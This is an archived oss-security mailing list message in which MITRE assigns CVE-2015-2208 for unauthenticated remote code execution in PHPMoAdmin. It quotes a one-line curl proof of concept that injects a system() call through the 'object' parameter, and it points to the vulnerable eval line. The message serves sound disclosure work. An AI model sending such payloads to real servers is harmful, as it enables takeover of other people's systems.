oss-sec mailing list archives

Re: CVE request: PHPMoAdmin Unauthorized Remote Code Execution

From: cve-assign () mitre org
Date: Wed, 4 Mar 2015 04:31:44 -0500 (EST)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Can you assign 2015 CVE identifier for unauthorized remote code execution
vulnerability in PHPMoAdmin <http://www.phpmoadmin.com/>

curl "http://example.com/moadmin.php";; -d "object=1;system('id');exit"

http://seclists.org/fulldisclosure/2015/Mar/19

693:    eval('$obj=' . $obj . ';'); //cast from string to array


Use CVE-2015-2208.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJU9tCnAAoJEKllVAevmvmsA+oH/A1WfaSkqOcFeboeuhy1nhPS
AwbQrbTIocKxnvLTuG4EbD61zkaFI7hND63BLGEih4GIaI1xlf9X3EL8EmYPSoY8
U8VKpEtJAVQzFWHYobxdKu71WHBGjM0GpF4ckH3XacbkVsluJRoh3BnwCrMZatjn
DI21LBR7tN01x2zqxIEqtVrNsv8ml9P2TLIMlTfMcVTnfCEtrmrcTx+TrWUbHofO
aHBvUOy85Dmm0SQXn3E9z1Nfa7IkpwthrlAANfUp04X15uVV5bbSlv+zjVD9XAtu
UPVYa98JZiZgKp5q7Q/8udG8carcs6uwOmjHqySVxPeVjXWArSDGD1KZhCqVH9k=
=o9Yr
-----END PGP SIGNATURE-----

Current thread:

CVE request: PHPMoAdmin Unauthorized Remote Code Execution Henri Salo (Mar 03)
- Re: CVE request: PHPMoAdmin Unauthorized Remote Code Execution cve-assign (Mar 04)